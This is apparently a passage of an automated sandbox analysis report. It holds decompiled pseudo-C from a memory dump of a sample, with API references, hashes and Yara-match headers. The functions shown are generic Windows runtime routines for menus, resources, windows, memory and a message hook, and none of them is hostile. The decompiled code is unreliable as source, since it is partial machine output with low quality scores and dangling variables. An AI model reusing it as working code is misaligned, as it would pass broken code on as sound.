				_t40 = __eax;
				if(L0044DEB4(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = L0044DD30(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = L0044DD30(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return L00409F88(_a12, _t49);
				}
			}










                                                    0x0044e7af
                                                    0x0044e7b1
                                                    0x0044e7b3
                                                    0x0044e7be
                                                    0x00000000
                                                    0x0044e842
                                                    0x0044e7c2
                                                    0x0044e7d2
                                                    0x0044e7ef
                                                    0x0044e7f4
                                                    0x0044e7f9
                                                    0x0044e806
                                                    0x0044e806
                                                    0x0044e7d4
                                                    0x0044e7db
                                                    0x0044e7e8
                                                    0x0044e7e8
                                                    0x0044e80d
                                                    0x00000000
                                                    0x0044e80f
                                                    0x0044e812
                                                    0x0044e821
                                                    0x00000000
                                                    0x0044e829

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ItemStateString
                                                    • String ID:
                                                    • API String ID: 306270399-0
                                                    • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                    • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474C10 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				void* _t19;
				intOrPtr _t35;
				intOrPtr _t36;
				struct HINSTANCE__* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t42);
				_push(0x474cbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_push(_t42);
				_push(0x474c8c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t44;
				_t40 = LoadLibraryA(E00404E80(_v8));
				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
				if(_t19 != 0) {
				}
				FreeResource(_t19);
				FreeLibrary(_t40);
				_pop(_t35);
				 *[fs:eax] = _t35;
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(0x474cc6);
				return E004049E4( &_v12, 2);
			}












                                                    0x00474c11
                                                    0x00474c13
                                                    0x00474c19
                                                    0x00474c1c
                                                    0x00474c22
                                                    0x00474c2a
                                                    0x00474c31
                                                    0x00474c32
                                                    0x00474c37
                                                    0x00474c3a
                                                    0x00474c3f
                                                    0x00474c40
                                                    0x00474c45
                                                    0x00474c48
                                                    0x00474c59
                                                    0x00474c67
                                                    0x00474c6e
                                                    0x00474c6e
                                                    0x00474c77
                                                    0x00474c7d
                                                    0x00474c84
                                                    0x00474c87
                                                    0x00474ca6
                                                    0x00474ca9
                                                    0x00474cac
                                                    0x00474cbe

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                    • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                    • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibraryResource$FindLoad
                                                    • String ID:
                                                    • API String ID: 622515136-0
                                                    • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                    • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00459634 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00459634(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x49ebb8; // 0x0
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E004595C4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                    0x00459636
                                                    0x00459639
                                                    0x0045963b
                                                    0x00459644
                                                    0x00459651
                                                    0x0045965a
                                                    0x0045965d
                                                    0x00459669
                                                    0x0045966e
                                                    0x0045966e
                                                    0x00459678
                                                    0x00459686
                                                    0x00459688
                                                    0x00459695
                                                    0x00459697
                                                    0x00459697
                                                    0x0045969e
                                                    0x0045969e
                                                    0x004596a7
                                                    0x004596ab
                                                    0x004596ad
                                                    0x004596c1
                                                    0x004596cd
                                                    0x004596d2
                                                    0x004596d3
                                                    0x004596ad
                                                    0x004596ab
                                                    0x00459678
                                                    0x004596d8
                                                    0x004596d8
                                                    0x004596e2

                                                    APIs
                                                    • EnumWindows.USER32(004595C4), ref: 00459669
                                                    • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                    • GetWindowLongA.USER32 ref: 0045968E
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$EnumLongWindows
                                                    • String ID:
                                                    • API String ID: 4191631535-0
                                                    • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                    • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                    • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                    • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return L0041DD20(_t23, _t25, _t18);
			}

















                                                    0x0041e19f
                                                    0x0041e1a2
                                                    0x0041e1a4
                                                    0x0041e1b4
                                                    0x0041e1b6
                                                    0x0041e1b9
                                                    0x0041e1bb
                                                    0x0041e1be
                                                    0x0041e1c3
                                                    0x0041e1c3
                                                    0x0041e1c4
                                                    0x0041e1ce
                                                    0x0041e1d0
                                                    0x0041e1d3
                                                    0x0041e1d5
                                                    0x0041e1d8
                                                    0x0041e1dd
                                                    0x0041e1de
                                                    0x0041e1e8
                                                    0x0041e1e9
                                                    0x0041e1ed
                                                    0x0041e1f6
                                                    0x0041e201

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                    • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                    • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                    • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                    • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401618 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401618(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E00401468(0x49e5ec, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                    0x0040161c
                                                    0x0040161e
                                                    0x00401620
                                                    0x00401622
                                                    0x00401636
                                                    0x0040163b
                                                    0x0040163d
                                                    0x00401641
                                                    0x00401649
                                                    0x0040164f
                                                    0x0040165b
                                                    0x00401660
                                                    0x00401660
                                                    0x00401665
                                                    0x0040166e
                                                    0x00401675
                                                    0x00401681
                                                    0x00401688
                                                    0x00000000
                                                    0x00401688
                                                    0x00401675
                                                    0x0040168e

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401636
                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 0040165B
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401681
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$Alloc$Free
                                                    • String ID: I
                                                    • API String ID: 3668210933-1966777607
                                                    • Opcode ID: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                    • Instruction ID: d5b131199f8cf9b3caee1c5a15836c0652bc1ac5bd3422d56553b580ad17c722
                                                    • Opcode Fuzzy Hash: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                    • Instruction Fuzzy Hash: 6DF044B17403206BEB315AAA4CC5F133AD89B45794F154176BE08BF3D9D6B99800866C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438CE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00438CE0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x49eb28; // 0x0
					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
						_t16 = 0 | L00437E28(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                                    0x00438ce0
                                                    0x00438ce2
                                                    0x00438ce3
                                                    0x00438ce5
                                                    0x00438ce9
                                                    0x00438d00
                                                    0x00438d17
                                                    0x00438d37
                                                    0x00438d19
                                                    0x00438d29
                                                    0x00438d29
                                                    0x00438d17
                                                    0x00438d3f

                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                    • GetPropA.USER32 ref: 00438D22
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                    • String ID:
                                                    • API String ID: 2582817389-0
                                                    • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                    • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458F44 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458F44(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x49ebb8; // 0x0
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x49ebd0 == 0) {
						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
						 *0x49ebd0 = _t2;
					}
					if( *0x49ebcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x49ebcc = _t2;
					}
					if( *0x49ebd4 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
						 *0x49ebd4 = _t2;
					}
				}
				return _t2;
			}





                                                    0x00458f45
                                                    0x00458f51
                                                    0x00458f5a
                                                    0x00458f6c
                                                    0x00458f71
                                                    0x00458f71
                                                    0x00458f7d
                                                    0x00458f87
                                                    0x00458f8c
                                                    0x00458f8c
                                                    0x00458f98
                                                    0x00458fab
                                                    0x00458fb0
                                                    0x00458fb0
                                                    0x00458f98
                                                    0x00458fb6

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                    • SetWindowsHookExA.USER32 ref: 00458F6C
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                    • CreateThread.KERNEL32 ref: 00458FAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                    • String ID:
                                                    • API String ID: 1195359707-0
                                                    • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                    • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00460AA0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00460AA0() {
				signed int _t2;
				struct HDC__* _t5;

				_t5 = GetDC(0);
				_t2 = GetDeviceCaps(_t5, 0xc);
				if(_t2 * GetDeviceCaps(_t5, 0xe) > 8) {
					 *0x49c08f = 0;
				} else {
					 *0x49c08f = 1;
				}
				return ReleaseDC(0, _t5);
			}





                                                    0x00460aa9
                                                    0x00460aae
                                                    0x00460ac3
                                                    0x00460ace
                                                    0x00460ac5
                                                    0x00460ac5
                                                    0x00460ac5
                                                    0x00460adf

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00460AA4
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00460AAE
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00460AB8
                                                    • ReleaseDC.USER32 ref: 00460AD8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                    • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047847C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int* _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v84;
				signed int _v1620;
				signed int _t142;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t147;
				signed char _t157;
				signed char _t158;
				signed int* _t165;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t256;
				intOrPtr* _t258;
				void* _t260;
				void* _t261;
				intOrPtr _t262;
				void* _t276;

				_t276 = __fp0;
				_t260 = _t261;
				_t262 = _t261 + 0xfffff9b0;
				_v12 = __ecx;
				_t258 = __edx;
				_v8 = __eax;
				_t224 =  *0x417dc0; // 0x417dc4
				E004053AC( &_v84, _t224);
				_push(_t260);
				_push(0x4787af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t262;
				_v20 = 0;
				_t211 = 0;
				_push(_t260);
				_push(0x47878c);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t262;
				_t256 =  *(__edx + 1) & 0x000000ff;
				if(_t256 > 0x40) {
					_t211 =  *0x49d980; // 0x477e3c
					E0040D200(_t211, 1);
					E00404378();
				}
				if(_t256 == 0) {
					L25:
					_v52 =  &_v1620;
					_v48 = _v12 + 4;
					_v44 = _t256;
					_v40 = 0;
					_t225 =  *_v12;
					_t142 =  *_t258;
					if(0 != 4) {
						__eflags = 0 - 1;
						if(0 == 1) {
							__eflags = _t256;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t142 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t142 = 8;
						}
						 *_v12 = 0xfffffffd;
						_v48 = _v48 - 4;
						_v40 = _v40 + 1;
					}
					_push(0);
					_push( &_v84);
					_push(_a4);
					_push( &_v52);
					_push(_t142);
					_push(0);
					_t143 =  *0x49d770; // 0x49b500
					_push(_t143);
					_push(_t225);
					_t144 = _v8;
					_push(_t144);
					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
						E00478A5C();
					}
					_t207 = _v20;
					if(_t207 == 0) {
						L39:
						_t147 = 0;
						_pop(_t226);
						 *[fs:eax] = _t226;
						_push(0x478793);
						_t208 = _v20;
						if(_t208 == 0) {
							L41:
							return _t147;
						} else {
							goto L40;
						}
						do {
							L40:
							_t208 = _t208 - 1;
							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
							_push(_t147);
							L00417E14();
						} while (_t208 != 0);
						goto L41;
					} else {
						do {
							_t207 = _t207 - 1;
							_t148 = _t260 + _t207 * 8 - 0x250;
							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
							_t272 = _t227;
							if(_t227 != 0) {
								L00405950( *_t148,  *_t148, _t227, _t272);
							}
						} while (_t207 != 0);
						goto L39;
					}
				} else {
					_v24 = _a8;
					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
					_t209 = 0;
					do {
						_v28 = _v28 - 0x10;
						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
						_v16 = _t157 & 0x7f;
						_t158 = _t157 & 0x00000080;
						if(_v16 != 0xa) {
							__eflags = _v16 - 0x48;
							if(_v16 != 0x48) {
								__eflags = _t158;
								if(_t158 == 0) {
									__eflags = _v16 - 0xc;
									if(_v16 != 0xc) {
										 *_v28 = _v16;
										_v28[2] =  *_v24;
										__eflags = _v16 - 5;
										if(_v16 >= 5) {
											__eflags = _v16 - 7;
											if(_v16 <= 7) {
												_t93 =  &_v24;
												 *_t93 =  &(_v24[1]);
												__eflags =  *_t93;
												_v28[3] =  *_v24;
											}
										}
									} else {
										__eflags =  *_v24 - 0x100;
										if( *_v24 != 0x100) {
											_t165 = _v24;
											 *_v28 =  *_t165;
											_v28[1] = _t165[1];
											_t211 = _v28;
											_v28[2] = _t165[2];
											_v28[3] = _t165[3];
											_v24 =  &(_v24[3]);
										} else {
											_v36 = _t260 + _v20 * 8 - 0x250;
											 *_v36 = L00405974(_v24[2], _t211);
											_v36[1] = 0;
											 *_v28 = 8;
											_v28[2] =  *_v36;
											_v20 = _v20 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v16 - 0xc;
								if(_v16 == 0xc) {
									__eflags =  *( *_v24) - 0x100;
									if( *( *_v24) == 0x100) {
										_t211 = 8;
										E00411330( *_v24, 8,  *_v24, _t256, _t276);
									}
								}
								 *_v28 = _v16 | 0x00004000;
								_v28[2] =  *_v24;
								goto L23;
							} else {
								_v32 = _t260 + _v20 * 8 - 0x250;
								__eflags = _t158;
								if(_t158 == 0) {
									 *_v32 = L00405974( *_v24, _t211);
									__eflags = 0;
									 *(_v32 + 4) = 0;
									 *_v28 = 8;
									_v28[2] =  *_v32;
								} else {
									 *_v32 = L00405974( *( *_v24), _t211);
									 *(_v32 + 4) =  *_v24;
									 *_v28 = 0x4008;
									_v28[2] = _v32;
								}
								_v20 = _v20 + 1;
								L23:
								_t98 =  &_v24;
								 *_t98 =  &(_v24[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v28 = 0xa;
							_v28[2] = 0x80020004;
						}
						L24:
						_t209 = _t209 + 1;
					} while (_t256 != _t209);
					goto L25;
				}
			}





































                                                    0x0047847c
                                                    0x0047847d
                                                    0x0047847f
                                                    0x00478488
                                                    0x0047848b
                                                    0x0047848d
                                                    0x00478493
                                                    0x00478499
                                                    0x004784a0
                                                    0x004784a1
                                                    0x004784a6
                                                    0x004784a9
                                                    0x004784ae
                                                    0x004784b1
                                                    0x004784b3
                                                    0x004784b4
                                                    0x004784b9
                                                    0x004784bc
                                                    0x004784bf
                                                    0x004784c6
                                                    0x004784c8
                                                    0x004784d5
                                                    0x004784da
                                                    0x004784da
                                                    0x004784e1
                                                    0x004786aa
                                                    0x004786b0
                                                    0x004786b9
                                                    0x004786bc
                                                    0x004786c4
                                                    0x004786ca
                                                    0x004786ce
                                                    0x004786d3
                                                    0x004786fd
                                                    0x00478700
                                                    0x00478702
                                                    0x00478704
                                                    0x00478706
                                                    0x0047870a
                                                    0x0047870c
                                                    0x0047870c
                                                    0x0047870a
                                                    0x00478704
                                                    0x004786d5
                                                    0x004786e4
                                                    0x004786e6
                                                    0x004786e6
                                                    0x004786ee
                                                    0x004786f4
                                                    0x004786f8
                                                    0x004786f8
                                                    0x00478711
                                                    0x00478716
                                                    0x0047871a
                                                    0x0047871e
                                                    0x0047871f
                                                    0x00478720
                                                    0x00478722
                                                    0x00478727
                                                    0x00478728
                                                    0x00478729
                                                    0x0047872c
                                                    0x00478734
                                                    0x00478739
                                                    0x00478739
                                                    0x0047873e
                                                    0x00478743
                                                    0x00478765
                                                    0x00478765
                                                    0x00478767
                                                    0x0047876a
                                                    0x0047876d
                                                    0x00478772
                                                    0x00478777
                                                    0x0047878b
                                                    0x0047878b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00478779
                                                    0x00478779
                                                    0x00478779
                                                    0x0047877a
                                                    0x00478781
                                                    0x00478782
                                                    0x00478787
                                                    0x00000000
                                                    0x00478745
                                                    0x00478745
                                                    0x00478745
                                                    0x00478746
                                                    0x0047874d
                                                    0x00478750
                                                    0x00478752
                                                    0x0047875c
                                                    0x0047875c
                                                    0x00478761
                                                    0x00000000
                                                    0x00478745
                                                    0x004784e7
                                                    0x004784ea
                                                    0x004784f8
                                                    0x004784fb
                                                    0x004784fd
                                                    0x004784fd
                                                    0x00478501
                                                    0x00478510
